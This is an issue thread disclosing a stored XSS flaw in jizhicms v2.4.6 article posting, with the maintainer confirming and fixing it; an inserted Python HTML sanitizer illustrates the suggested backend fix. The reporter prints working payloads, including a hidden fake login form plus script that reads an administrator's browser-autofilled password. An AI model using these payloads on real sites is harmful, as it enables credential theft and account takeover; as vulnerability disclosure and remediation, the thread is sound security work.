jizhicms v2.4.6 has an XSS vulnerability in the post article
Closed this issue · 5 comments
The content of an article published from the front end is filtered only in the front end, not in the backend, which allows attackers to publish an article containing malicious JavaScript by modifying the request packet. When the backend administrator clicks on the article preview, this malicious JavaScript is executed.
When submitting, you can see that the post request sent is:
Modify the submitted content to:
%3Cp%3Etest%3C%2Fp%3E%3Cp%3E%3Cscript%3Ealert('xss')%3C%2Fscript%3E
At this point, if the administrator previews the submitted article, a pop-up window will appear
At this point, it indicates that the embedded JavaScript script has been maliciously executed
I know that the entire system's cookies have been set to HttpOnly, which makes it impossible to obtain cookies through JavaScript scripts. However, if the administrator has enabled the browser's "automatic password filling" function, then the attacker can construct the following JavaScript script to obtain the administrator's plaintext password:
<p>test</p>
<form method="post" class="layui-form" onsubmit="return false;" hidden>
<input name="cache" id="cache" type="hidden" value="" />
<select name="lang" lay-filter="lang">
<option value="">选择语言</option>
<option selected value="zh_cn">中文简体</option>
<option value="zh_cht">中文繁体</option>
</select>
<hr class="hr15">
<input name="username" placeholder="用户名" type="text" lay-verify="required" class="layui-input" >
<hr class="hr15">
<input name="password" lay-verify="required" placeholder="密码" type="password" class="layui-input">
<hr class="hr15">
<input value="登录" lay-submit lay-filter="login" style="width:100%;" type="submit">
<hr class="hr20" >
</form>
<script>
setTimeout(function() {
const password = document.getElementsByName('password')[0].value;
alert(`the password is:${password}`);
}, 5000);
</script>
Submit the script after URL encoding
Administrator clicks on preview:
Here, the plaintext password has been displayed in a pop-up by the JavaScript. If the pop-up is changed to send the plaintext password to the attacker's server, the attacker obtains the administrator's plaintext password without the administrator being aware of it.
Modification suggestions:
Please filter the content of the article on the backend
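A server-side allowlist filter of the kind the report asks for, added here as an illustration; it is not jizhicms code, the thread does not show the backend language, so it uses Python's standard library, and the names `ArticleSanitizer`, `sanitize_article` and the tag sets are my own choices. It drops `<script>` together with its body, drops the `<form>`/`<select>`/`<input>` markup the credential-harvesting payload depends on, strips `on*` handlers and `javascript:` URLs, and re-escapes text, and it can take the still percent-encoded request body so the filter sees exactly what the browser would render.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import unquote

# Tags a normal article needs; anything else (input, hr, iframe, ...) is dropped.
ALLOWED_TAGS = {"p", "br", "b", "i", "em", "strong", "ul", "ol", "li", "a", "img"}
ALLOWED_ATTRS = {"a": {"href", "title"}, "img": {"src", "alt"}}
# Tags whose inner content is discarded as well: script bodies, and the
# form/select/option markup the credential-harvesting payload above relies on.
DROP_WITH_CONTENT = {"script", "style", "form", "select", "option", "textarea"}
SAFE_URL_PREFIXES = ("http://", "https://", "/")


class ArticleSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out, self.skip_depth = [], 0

    def handle_starttag(self, tag, attrs):
        if tag in DROP_WITH_CONTENT:
            self.skip_depth += 1          # swallow the element and its body
            return
        if self.skip_depth or tag not in ALLOWED_TAGS:
            return
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, ()):
                continue                  # drops on* handlers, style, hidden, ...
            if name in ("href", "src") and not (value or "").strip().lower().startswith(SAFE_URL_PREFIXES):
                continue                  # blocks javascript: and data: URLs
            kept.append(f' {name}="{escape(value or "", quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in DROP_WITH_CONTENT:
            self.skip_depth = max(0, self.skip_depth - 1)
        elif not self.skip_depth and tag in ALLOWED_TAGS - {"br", "img"}:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skip_depth:           # text is re-escaped, never trusted
            self.out.append(escape(data, quote=False))


def sanitize_article(body: str, url_encoded: bool = False) -> str:
    # Decode a still percent-encoded request body first, so the filter sees what the browser would render.
    parser = ArticleSanitizer()
    parser.feed(unquote(body) if url_encoded else body)
    parser.close()
    return "".join(parser.out)
```

Fed the percent-encoded body from the report with `url_encoded=True`, it returns `<p>test</p><p>` with the script gone; the second payload's form, inputs and script are dropped along with their contents, leaving only `<p>test</p>`.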
Hello, I tried it and did not find this problem. Please send your test to demo.jizhicms.cn, thanks.
I found a similar issue; someone has already posted it there and no problem appeared: https://demo.jizhicms.cn/news/630.html
Sorry, the webpage you provided cannot be opened due to a 404 error.
But I published an article called 'xsstest' and successfully triggered the pop-up window by modifying the request packet.
In the preview interface, it is possible to pop up a window
However, since I do not have approval and preview permissions in the backend interface, I am unable to test there. Since pop-up windows occur in the preview for ordinary users in the backend, they should also occur in the preview for super administrators in the backend.
Good job!
Very impressive. I followed your steps and reproduced the effect perfectly! I will fix this bug in the near future, thanks!
Fixed.